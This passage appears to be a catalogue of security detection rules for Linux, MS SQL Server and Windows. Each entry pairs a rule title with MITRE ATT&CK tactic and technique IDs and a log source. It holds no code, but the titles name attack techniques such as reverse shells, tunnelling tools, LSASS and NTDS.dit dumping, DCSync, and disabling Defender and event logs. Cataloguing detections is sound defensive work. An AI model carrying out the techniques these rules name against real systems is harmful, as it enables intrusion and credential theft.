Изменение файлов в домашнем каталоге другим пользователем

TA0003 (Persistence)

T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Auditd

Linux

RV-D-485

Подозрительное изменение директории /etc

TA0003 (Persistence)

T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification)

Auditd

Linux

RV-D-486

Загрузка webshell оболочки Linux

TA0003 (Persistence)

T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

Auditd

Linux

RV-D-487

Повышение привилегий с помощью GTFOBins

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.011 (Command and Scripting Interpreter: Lua), T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching)

Auditd

Linux

RV-D-488

Использование утилиты fusermount

TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation)

Auditd

Linux

RV-D-489

Поиск данных в сетевых папках Linux

TA0009 (Collection)

T1039 (Data from Network Shared Drive)

Auditd

Linux

RV-D-492

Размещение архивов в сетевой папке Linux

TA0009 (Collection)

T1074 (Data Staged)

Auditd

Linux

RV-D-509

Уничтожение информации на диске в Linux

TA0040 (Impact)

T1561 (Disk Wipe), T1561.001 (Disk Wipe: Disk Content Wipe), T1561.002 (Disk Wipe: Disk Structure Wipe)

Auditd

Linux

RV-D-511

Обнаружена команда reverse/bind шелла

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python)

Auditd

Linux

RV-D-516

Модификация файлов MOTD в Linux

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification)

Auditd

Linux

RV-D-517

Модификация разрешений системных файлов в Linux

TA0003 (Persistence)

T1222 (File and Directory Permissions Modification), T1222.002 (File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification), T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid)

Auditd

Linux

RV-D-518

Запуск утилиты msldapdump для разведки

TA0007 (Discovery)

T1018 (Remote System Discovery), T1046 (Network Service Discovery), T1069 (Permission Groups Discovery), T1069.002 (Permission Groups Discovery: Domain Groups), T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account), T1201 (Password Policy Discovery), T1615 (Group Policy Discovery)

Auditd

Linux

RV-D-536

Steganography detected in Linux

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.003 (Obfuscated Files or Information: Steganography)

Auditd

Linux

RV-D-538

Extraction of clipboard contents in Linux

TA0009 (Collection)

T1115 (Clipboard Data)

Auditd

Linux

RV-D-546

Modification of timers on a Linux host

TA0002 (Execution)

T1053 (Scheduled Task/Job), T1053.006 (Scheduled Task/Job: Systemd Timers)

Auditd

Linux

RV-D-547

Reading of critical Linux files

TA0009 (Collection)

T1005 (Data from Local System), T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files)

Auditd

Linux

RV-D-548

Use of the at utility

TA0003 (Persistence)

T1053 (Scheduled Task/Job), T1053.002 (Scheduled Task/Job: At)

Auditd

Linux

RV-D-549

Modification of Linux system libraries

TA0003 (Persistence)

T1554 (Compromise Host Software Binary)

Auditd

Linux

RV-D-550

Modification of settings to hide users

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.002 (Hide Artifacts: Hidden Users)

Auditd

Linux

RV-D-572

Source code compilation detected on Linux

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.004 (Obfuscated Files or Information: Compile After Delivery)

Auditd

Linux

RV-D-578

Process launch via ld.so

TA0003 (Persistence)

T1574 (Hijack Execution Flow), T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking)

Auditd

Linux

RV-D-579

Modification of Linux binary files

TA0003 (Persistence)

T1554 (Compromise Host Software Binary)

Auditd

Linux

RV-D-630

regreSSHion attack

TA0001 (Initial Access)

T1190 (Exploit Public-Facing Application)

secure, auth

Linux

RV-D-657

Disabling mandatory integrity control

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Auditd

Linux

RV-D-685

Adding a file to browser extensions on Linux

TA0003 (Persistence)

T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)

Auditd

Linux

RV-D-686

Adding a browser extension via the CLI on Linux

TA0003 (Persistence)

T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)

Auditd

Linux

RV-D-762

Anomalous bind mount

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.013 (Hide Artifacts: Bind Mounts)

Auditd

Linux

RV-D-763

Abuse of extended attributes

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.014 (Hide Artifacts: Extended Attributes)

Auditd

Linux

RV-D-768

Use of chisel for traffic tunneling

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Auditd

Microsoft

MSSQL

RV-D-632

Password Spraying attack on MS SQL Server

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Application

Microsoft

MSSQL

RV-D-633

Password guessing against MS SQL Server

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Application

Microsoft

MSSQL

RV-D-634

Successful password guessing against MS SQL Server

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Application

Microsoft

MSSQL

RV-D-635

Privileged user login to MS SQL Server

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

Application

Microsoft

MSSQL

RV-D-650

Modification of MS SQL Server database audit

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-651

Retrieving MS SQL Server audit information

TA0007 (Discovery)

T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery)

Application

Microsoft

MSSQL

RV-D-652

Creating a backup of an MS SQL Server database

TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1005 (Data from Local System), T1074 (Data Staged), T1074.001 (Data Staged: Local Data Staging)

dm_exec_cached_plans, PowerShell

Microsoft

MSSQL

RV-D-653

Deletion of multiple tables in MS SQL Server

TA0040 (Impact)

T1485 (Data Destruction)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-654

Deletion of a database in MS SQL Server

TA0040 (Impact)

T1485 (Data Destruction)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-655

Administrator role assigned to an MS SQL Server user

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-656

Password change for a privileged MS SQL Server account

TA0003 (Persistence)

T1098 (Account Manipulation)

Security, dm_exec_cached_plans

Microsoft

MSSQL

RV-D-683

Retrieving MSSQL user password hashes

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-684

Retrieving MSSQL user privilege information

TA0007 (Discovery)

T1087 (Account Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-689

Retrieving MSSQL version information

TA0007 (Discovery)

T1082 (System Information Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-690

Retrieving MSSQL user information

TA0007 (Discovery)

T1087 (Account Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-691

Searching for users with administrative rights in MSSQL

TA0007 (Discovery)

T1087 (Account Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-692

Access to the local file system from MSSQL

TA0007 (Discovery)

T1083 (File and Directory Discovery), T1565 (Data Manipulation)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-693

Retrieving OS user information

TA0007 (Discovery)

T1087 (Account Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-694

Retrieving database encryption algorithm information

TA0007 (Discovery)

T1082 (System Information Discovery), T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-695

Attempt to enable MS SQL mixed-mode authentication

TA0005 (Defense Evasion)

T1112 (Modify Registry), T1556 (Modify Authentication Process)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-697

Setting an insecure MS SQL property

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1600 (Weaken Encryption)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-698

Disabling MS SQL user login policy

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1562.001 (Impair Defenses: Disable or Modify Tools)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-699

Enabling insecure parameters in MSSQL configuration

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1562.001 (Impair Defenses: Disable or Modify Tools)

Application

Microsoft

MSSQL

RV-D-700

Creating MSSQL backups via PowerShell

TA0009 (Collection)

T1074 (Data Staged), T1213 (Data from Information Repositories)

PowerShell

Microsoft

MSSQL

RV-D-716

Use of procedures for local code execution

TA0002 (Execution)

T1059 (Command and Scripting Interpreter)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-717

Sending SQL query results by email

TA0010 (Exfiltration)

T1567 (Exfiltration Over Web Service)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-734

Reading a registry key via MSSQL

TA0007 (Discovery)

T1012 (Query Registry), T1082 (System Information Discovery)

Application

Microsoft

MSSQL

RV-D-735

Writing a registry key via MSSQL

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Application

Microsoft

MSSQL

RV-D-736

Attempt to change a Windows service state

TA0040 (Impact), TA0002 (Execution)

T1489 (Service Stop), T1569 (System Services), T1569.002 (System Services: Service Execution)

Application

Microsoft

MSSQL

RV-D-737

Attempt to query a Windows service state

TA0007 (Discovery)

T1007 (System Service Discovery), T1505 (Server Software Component), T1505.001 (Server Software Component: SQL Stored Procedures)

Application

Microsoft

MSSQL

RV-D-738

Attempt to connect to the DBMS via DAC

TA0003 (Persistence)

T1505 (Server Software Component)

Application

Microsoft

MSSQL

RV-D-755

Use of the sp_proxy and sp_grant_proxy stored procedures

TA0003 (Persistence), TA0005 (Defense Evasion)

T1505 (Server Software Component), T1505.001 (Server Software Component: SQL Stored Procedures), T1548 (Abuse Elevation Control Mechanism)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-756

Searching for database backups

TA0007 (Discovery), TA0003 (Persistence)

T1083 (File and Directory Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-758

Export of an MSSQL encryption key or certificate

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.004 (Unsecured Credentials: Private Keys), T1649 (Steal or Forge Authentication Certificates)

TrackBackupCrypto.xel

Microsoft

Windows

RV-D-88

Modification of a scheduled task in Group Policy

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-230

Compression of dump files with 7Zip

TA0009 (Collection)

T1560 (Archive Collected Data), T1560.001 (Archive Collected Data: Archive via Utility)

Security, Sysmon

Microsoft

Windows

RV-D-231

Compression of dump files with WinRAR

TA0009 (Collection)

T1560 (Archive Collected Data), T1560.001 (Archive Collected Data: Archive via Utility)

Security, Sysmon

Microsoft

Windows

RV-D-232

Use of screen capture utilities

TA0009 (Collection)

T1113 (Screen Capture)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-233

Requests to the Telegram API by a suspicious process

TA0011 (Command and Control)

T1102 (Web Service), T1102.002 (Web Service: Bidirectional Communication), T1567 (Exfiltration Over Web Service)

Sysmon

Microsoft

Windows

RV-D-234

Downloading files from web resources with built-in utilities

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-235

Tunneling via ngrok

TA0011 (Command and Control)

T1090 (Proxy), T1090.002 (Proxy: External Proxy), T1102 (Web Service), T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-236

Use of a DNS tunnel

TA0011 (Command and Control)

T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS)

Sysmon

Microsoft

Windows

RV-D-237

Use of Replace.exe

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-238

Remote access software installed

TA0011 (Command and Control), TA0008 (Lateral Movement), TA0003 (Persistence)

T1021 (Remote Services), T1021.005 (Remote Services: VNC), T1133 (External Remote Services), T1219 (Remote Access Tools), T1219.002 (Remote Access Tools: Remote Desktop Software)

Security

Microsoft

Windows

RV-D-239

RDP connection through a tunnel

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-240

Use of the gs-netcat utility from the gsocket toolkit

TA0011 (Command and Control)

T1090 (Proxy), T1090.002 (Proxy: External Proxy), T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-241

AS-REP Roasting attack detected

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1110 (Brute Force), T1110.002 (Brute Force: Password Cracking), T1558 (Steal or Forge Kerberos Tickets), T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting)

Security

Microsoft

Windows

RV-D-242

Copying registry hives containing password hashes

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.002 (OS Credential Dumping: Security Account Manager), T1003.004 (OS Credential Dumping: LSA Secrets)

Security

Microsoft

Windows

RV-D-243

DCSync attack

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)

Security

Microsoft

Windows

RV-D-244

Golden Ticket attack detected

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-245

TGT ticket creation by a hacking tool detected

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)

Sysmon

Microsoft

Windows

RV-D-246

Attempt to dump the LSASS process using comsvcs.dll

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Security

Microsoft

Windows

RV-D-247

LSASS dump using Python utilities

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Sysmon

Microsoft

Windows

RV-D-248

Attempt to dump the LSASS process using the Procdump utility

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Security, Sysmon

Microsoft

Windows

RV-D-249

Attempt to dump the LSASS process using the HandleKatz utility

TA0002 (Execution), TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1106 (Native API)

Sysmon

Microsoft

Windows

RV-D-250

Retrieving RDP service information via sc.exe

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

Security, Sysmon

Microsoft

Windows

RV-D-251

Attempt to dump NTDS.dit detected

TA0005 (Defense Evasion), TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.003 (OS Credential Dumping: NTDS), T1006 (Direct Volume Access)

Security, Sysmon, PowerShell

Microsoft

Windows

RV-D-252

Password Spraying attack

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying), T1110.004 (Brute Force: Credential Stuffing)

Security

Microsoft

Windows

RV-D-253

Credential capture using Rpcping.exe

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

Security, Sysmon

Microsoft

Windows

RV-D-254

Suspicious Active Directory database snapshot via ADExplorer

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files), T1552.003 (Unsecured Credentials: Bash History)

Security, Sysmon

Microsoft

Windows

RV-D-255

Searching for processes with vulnerable modules

TA0006 (Credential Access), TA0007 (Discovery)

T1003 (OS Credential Dumping), T1057 (Process Discovery)

Security, Sysmon

Microsoft

Windows

RV-D-256

Use of the RDPStrike utility detected

TA0006 (Credential Access), TA0009 (Collection)

T1055 (Process Injection), T1055.001 (Process Injection: Dynamic-link Library Injection), T1056 (Input Capture), T1056.004 (Input Capture: Credential API Hooking), T1212 (Exploitation for Credential Access)

Sysmon

Microsoft

Windows

RV-D-257

Possibly successful user password guessing

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Security

Microsoft

Windows

RV-D-258

Suspicious access to the NTDS.dit file

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.003 (OS Credential Dumping: NTDS)

Security

Microsoft

Windows

RV-D-259

LSASS process read by a suspicious process

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Security

Microsoft

Windows

RV-D-260

Suspicious access to LSASS process memory

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Sysmon

Microsoft

Windows

RV-D-261

LSASS dump via Task Manager

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Sysmon

Microsoft

Windows

RV-D-262

Account password guessing on a host

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Security

Microsoft

Windows

RV-D-263

Multiple failed authentication attempts for an account

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Security

Microsoft

Windows

RV-D-264

Domain account enumeration by brute force

TA0006 (Credential Access)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account), T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Security

Microsoft

Windows

RV-D-265

Launch of aspnet_compiler.exe to compile an application in an atypical directory

TA0005 (Defense Evasion)

T1127 (Trusted Developer Utilities Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-266

Disabling or modifying Windows Audit Log Policy

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

Security, Sysmon

Microsoft

Windows

RV-D-267

Windows event log was cleared

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.001 (Indicator Removal: Clear Windows Event Logs)

Security, System

Microsoft

Windows

RV-D-268

UAC bypass via the registry

TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control)

Sysmon

Microsoft

Windows

RV-D-269

Base64 encoding of a file in a suspicious directory using Certutil

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information)

Security, Sysmon

Microsoft

Windows

RV-D-270

Base64 encoding of a file using Certutil

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information)

Security, Sysmon

Microsoft

Windows

RV-D-271

Module loaded into the cmstp process from a non-standard path

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.003 (System Binary Proxy Execution: CMSTP)

Sysmon

Microsoft

Windows

RV-D-272

cmstp process loading script execution modules

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.003 (System Binary Proxy Execution: CMSTP)

Sysmon

Microsoft

Windows

RV-D-273

Disabling CrashDump via registry key modification

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Sysmon

Microsoft

Windows

RV-D-274

Remote thread creation by a process located in a suspicious location

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-275

DCShadow attack

TA0005 (Defense Evasion)

T1207 (Rogue Domain Controller)

Security

Microsoft

Windows

RV-D-276

Disabling or modifying Windows Defender

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

PowerShell, Security, Sysmon, System

Microsoft

Windows

RV-D-277

Disabling the Windows Defender ETW provider

TA0005 (Defense Evasion)

T1562.006 (Impair Defenses: Indicator Blocking)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-278

Disabling or modifying Defender Firewall

TA0005 (Defense Evasion)

T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Security, Sysmon

Microsoft

Windows

RV-D-279

Modification of Windows Defender Firewall policies

TA0005 (Defense Evasion)

T1562.004 (Impair Defenses: Disable or Modify System Firewall)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-280

Disabling the .NET ETW provider

TA0005 (Defense Evasion)

T1562.006 (Impair Defenses: Indicator Blocking)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-281

Disabling the Windows EventLog service

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-282

Disabling EventLog event collection via the registry

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

Security, Sysmon

Microsoft

Windows

RV-D-283

File created and deleted within a short time interval via a command-line interpreter

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.004 (Indicator Removal: File Deletion), T1071.002 (Application Layer Protocol: File Transfer Protocols)

Sysmon

Microsoft

Windows

RV-D-284

Launch of a file with a double extension

TA0005 (Defense Evasion), TA0002 (Execution)

T1036 (Masquerading), T1036.007 (Masquerading: Double File Extension), T1204 (User Execution), T1204.002 (User Execution: Malicious File)

Security, Sysmon

Microsoft

Windows

RV-D-285

Launch of a file without an extension

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.008 (Masquerading: Masquerade File Type)

Security, Sysmon

Microsoft

Windows

RV-D-286

Exploitation of the GrimResource utility

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.014 (System Binary Proxy Execution: MMC)

Security, Sysmon

Microsoft

Windows

RV-D-287

Disabling IIS event logging

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-288

DLL loaded by a system process from a suspicious location

TA0005 (Defense Evasion)

T1070 (Indicator Removal)

Sysmon

Microsoft

Windows

RV-D-289

Unsigned DLL loaded by a Windows utility

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32), T1218.011 (System Binary Proxy Execution: Rundll32)

Sysmon

Microsoft

Windows

RV-D-290

Downloading files using the LOLBin InstallUtil.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.004 (System Binary Proxy Execution: InstallUtil)

Security, Sysmon

Microsoft

Windows

RV-D-291

Use of the Provisioning_Commands registry key to mask program launches

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Sysmon

Microsoft

Windows

RV-D-292

Module loaded into the mmc process from a non-standard path

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.014 (System Binary Proxy Execution: MMC)

Sysmon

Microsoft

Windows

RV-D-293

Modification of sensitive registry values used for detection evasion

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Sysmon

Microsoft

Windows

RV-D-294

mshta process loading script execution modules

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.005 (System Binary Proxy Execution: Mshta)

Sysmon

Microsoft

Windows

RV-D-295

Network connection from a suspicious directory

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Sysmon

Microsoft

Windows

RV-D-296

Network connection created by the Winlogon process

TA0005 (Defense Evasion), TA0002 (Execution), TA0011 (Command and Control)

T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)

Sysmon

Microsoft

Windows

RV-D-297

Module loaded into the odbcconf process from a non-standard path

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.008 (System Binary Proxy Execution: Odbcconf)

Sysmon

Microsoft

Windows

RV-D-298

Launch of a potentially fake hxtsr.exe instance

TA0005 (Defense Evasion)

T1036 (Masquerading)

Security, Sysmon

Microsoft

Windows

RV-D-299

Use of the outdated PowerShell v2

TA0005 (Defense Evasion)

T1562.010 (Impair Defenses: Downgrade Attack)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-300

Disabling the PowerShell ETW provider

TA0005 (Defense Evasion)

T1562.006 (Impair Defenses: Indicator Blocking)

Security, Sysmon

Microsoft

Windows

RV-D-301

Launch of the AddinUtil.exe process from a suspicious directory

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-302

Unusual application execution via AtBroker.EXE

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-303

Installation of a root certificate via CertMgr.exe

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)

Security, Sysmon

Microsoft

Windows

RV-D-304

Downloading files from an IP address via CertOC.EXE

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-305

Suspicious DLL loaded via CertOC.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-306

New root certificate installed via Certutil.exe

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)

Security, Sysmon

Microsoft

Windows

RV-D-307

Potentially malicious use of Control Panel items

TA0005 (Defense Evasion), TA0002 (Execution), TA0003 (Persistence)

T1218 (System Binary Proxy Execution), T1218.002 (System Binary Proxy Execution: Control Panel), T1546 (Event Triggered Execution)

Security, Sysmon

Microsoft

Windows

RV-D-308

Downloading files via IMEWDBLD.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-309

Process memory dump via Dotnet-Dump

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-310

Attempt to dump memory using RdrLeakDiag.exe

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.001 (Masquerading: Invalid Code Signature)

Security, Sysmon

Microsoft

Windows

RV-D-311

Downloading a file via MpCmdRun.EXE

TA0005 (Defense Evasion), TA0011 (Command and Control)

T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-312

Launch of a suspicious cab file via msdt.exe

TA0005 (Defense Evasion)

T1202 (Indirect Command Execution)

Security, Sysmon

Microsoft

Windows

RV-D-313

Downloading files via msedge_proxy.exe

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-314

Call of the DllUnregisterServer function via Msiexec.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.007 (System Binary Proxy Execution: Msiexec)

Security, Sysmon

Microsoft

Windows

RV-D-315

Launch of an arbitrary DLL via Msiexec.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.007 (System Binary Proxy Execution: Msiexec)

Security, Sysmon

Microsoft

Windows

RV-D-316

Downloading files via PresentationHost.exe

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-317

Downloading a file via ProtocolHandler

TA0005 (Defense Evasion), TA0011 (Command and Control)

T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-318

Disabling volume snapshots

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Security, Sysmon

Microsoft

Windows

RV-D-319

Storage write protection disabled

TA0005 (Defense Evasion)

-

Security, Sysmon

Microsoft

Windows

RV-D-320

Suspicious execution of Regasm/Regsvcs with a non-standard extension

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.009 (System Binary Proxy Execution: Regsvcs/Regasm)

Security, Sysmon

Microsoft

Windows

RV-D-321

Import of a registry key from an ADS

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Security, Sysmon

Microsoft

Windows

RV-D-322

Downloading files via Squirrel.exe

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-323

Downloading files via MS-AppInstaller

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-324

Kernel memory dump via LiveKD

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

Security, Sysmon

Microsoft

Windows

RV-D-325

New process created via Taskmgr.exe

TA0005 (Defense Evasion)

T1036 (Masquerading)

Security, Sysmon

Microsoft

Windows

RV-D-326

Unusual argument or child process of Wlrmdr.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-327

Suspicious Windows Update agent

TA0005 (Defense Evasion)

T1036 (Masquerading)

Security, Sysmon

Microsoft

Windows

RV-D-328

Modification of sensitive RDP parameters

TA0005 (Defense Evasion), TA0003 (Persistence)

